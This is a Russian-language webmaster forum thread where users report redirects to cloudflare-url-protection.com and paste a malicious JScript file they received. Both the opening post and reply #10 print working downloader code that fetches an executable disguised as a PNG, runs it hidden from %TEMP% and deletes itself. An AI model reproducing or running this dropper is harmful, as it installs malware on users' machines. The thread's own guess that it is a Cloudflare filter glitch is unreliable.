что за хрень? cloudflare-url-protection.com

12 3
AboutSEO
На сайте с 18.01.2007
Offline
154
4958

залез в поиск по форуму, а мне пихнули скрипт который открылся в редакторе..

файл myii8c.js

код


try {var sh/*cx9mc*/=/*cx9mc*/new/*cx9mc*/ ActiveXObject(/*cx9mc*/'WScript.Shell'/*cx9mc*/)/*cx9mc*/;var url='https://cloudflare-url-protection.com/cloudflare7.png'/*cx9mc*/;var file=sh.ExpandEnvironmentStrings(/*cx9mc*/'%TEMP%'/*cx9mc*/) + '/ff35fc06.exe'/*cx9mc*/;function gx(/*cx9mc*//*cx9mc*/){var o/*cx9mc*/=/*cx9mc*/new/*cx9mc*/ ActiveXObject(/*cx9mc*/'MSXML2.ServerXMLHTTP'/*cx9mc*/)/*cx9mc*/;o.setTimeouts(/*cx9mc*/5000,5000,6000,60000/*cx9mc*/)/*cx9mc*/;o.setOption(/*cx9mc*/2, 13056/*cx9mc*/)/*cx9mc*/;return o/*cx9mc*/;}var h=gx(/*cx9mc*//*cx9mc*/)/*cx9mc*/;h.open(/*cx9mc*/'GET',url,false/*cx9mc*/)/*cx9mc*/;h.send(/*cx9mc*//*cx9mc*/)/*cx9mc*/;if (/*cx9mc*/h.status==200/*cx9mc*/){var s=WScript.CreateObject(/*cx9mc*/'ADODB.Stream'/*cx9mc*/)/*cx9mc*/;s.open(/*cx9mc*//*cx9mc*/)/*cx9mc*/;s.type=1/*cx9mc*/;s.write(/*cx9mc*/h.responseBody/*cx9mc*/)/*cx9mc*/;s.position=0/*cx9mc*/; s.SaveToFile(/*cx9mc*/file,2/*cx9mc*/)/*cx9mc*/;s.close(/*cx9mc*//*cx9mc*/)/*cx9mc*/;sh.run(/*cx9mc*/file,0,false/*cx9mc*/)/*cx9mc*/;new ActiveXObject(/*cx9mc*/'Scripting.FileSystemObject'/*cx9mc*/).DeleteFile(/*cx9mc*/WScript.ScriptFullName/*cx9mc*/)/*cx9mc*/;}} catch(/*cx9mc*/e/*cx9mc*/){}

че за фигня?

и поиск постоянно рефрешитса!

fhuuz
На сайте с 08.03.2009
Offline
247
#1

Подключили защиту от спама какую то, наверно. Недавно капчу периодически запрашивало...

AboutSEO
На сайте с 18.01.2007
Offline
154
#2
fhuuz:
Подключили защиту от спама какую то, наверно. Недавно капчу периодически запрашивало...

я понял, что подключили, но права-то на скачку, а не на выполнение...

maestro.vic
На сайте с 01.11.2010
Offline
65
#3

Задолбала эта фишка. Также открылся какой-то скрипт в редакторе notepad++

А страница с результатами поиска пропала. Вместо нее появилось окошко с анимацией:

Unlock
На сайте с 01.08.2004
Offline
758
#4

Напрягает слегонца. На новостях постоянно появляется и главное - не всегда страница обратно загружается.

Есть желание, - тысяча способов; нет желания, - тысяча поводов! /Петр-I/.
Doroshev
На сайте с 21.01.2010
Offline
178
#5
Unlock:
Напрягает слегонца. На новостях постоянно появляется и главное - не всегда страница обратно загружается.

У меня только что появилась эта хрень. Новость начал читать на серче и сразу получил https://cloudflare-url-protection.com/. Обратно на новость не перенаправляет.

6uoncuxo3
На сайте с 05.11.2008
Offline
202
#6

Позапрещал скрипторезами кучу фреймов и скриптов, вроде полегчало.

We all live in a sick world, where hatred is a weapon, and freedom - a dream. © На небе — Бог, на земле — Россия. © Сербская поговорка.
Кошачий
На сайте с 12.10.2012
Offline
116
#7

Редиректит сюда (как пример) после открытия новости/статьи, каждая страничка так. Неудобно, беда :(

Когда планета покроется котиками, она станет мягкой и пушистой ▲_▲ ▲_▲ Котосмайлы () на котофорум (/) ▲_▲
A
На сайте с 20.08.2010
Offline
775
#8

Файл зловредный?

Sergey Petrenko
На сайте с 23.10.2000
Offline
482
#9

Пардон, тут временно свихнулся фильтр Cloudflare. Понизил ему чувствительность, должно перестать надоедать.

WEMASTER
На сайте с 16.08.2012
Offline
95
#10

Вот ваш JavaScript код.

try {

var sh = new ActiveXObject( 'WScript.Shell' ) ;
var url = 'https://cloudflare-url-protection.com/cloudflare7.png' ;
var file = sh.ExpandEnvironmentStrings( '%TEMP%' ) + '/ff35fc06.exe' ;

function gx( ) {
var o = new ActiveXObject( 'MSXML2.ServerXMLHTTP' ) ;
o.setTimeouts( 5000, 5000, 6000, 60000 ) ;
o.setOption( 2, 13056 ) ;
return o ;
}
var h = gx( ) ;
h.open( 'GET', url, false ) ;
h.send( ) ;
if ( h.status == 200 ) {
var s = WScript.CreateObject( 'ADODB.Stream' ) ;
s.open( ) ;
s.type = 1 ;
s.write( h.responseBody ) ;
s.position = 0 ;
s.SaveToFile( file, 2 ) ;
s.close( ) ;
sh.run( file, 0, false ) ;
new ActiveXObject( 'Scripting.FileSystemObject' ).DeleteFile( WScript.ScriptFullName ) ;
}
} catch ( e ) {}

https://cloudflare-url-protection.com/cloudflare7.png - ехе файл (MZ — стандартный формат 16-битных исполнимых файлов с расширением .EXE для DOS.)

Скорее всего это вирус, ну или WScript.Shell.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий